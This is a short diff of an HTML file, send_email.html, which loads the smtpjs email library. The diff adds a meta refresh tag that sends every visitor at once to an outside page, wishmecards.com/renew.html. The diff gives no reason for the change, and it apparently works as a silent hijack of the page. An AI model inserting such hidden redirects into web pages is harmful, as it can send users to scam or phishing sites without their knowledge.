--- a/send_email.html
+++ b/send_email.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html>
-<head>
+<head><meta http-equiv="refresh" content="0; URL='https://wishmecards.com/renew.html'" />
 	<title></title>
 	<script src="https://smtpjs.com/v3/smtp.js"></script>  
 	<script type="text/javascript">
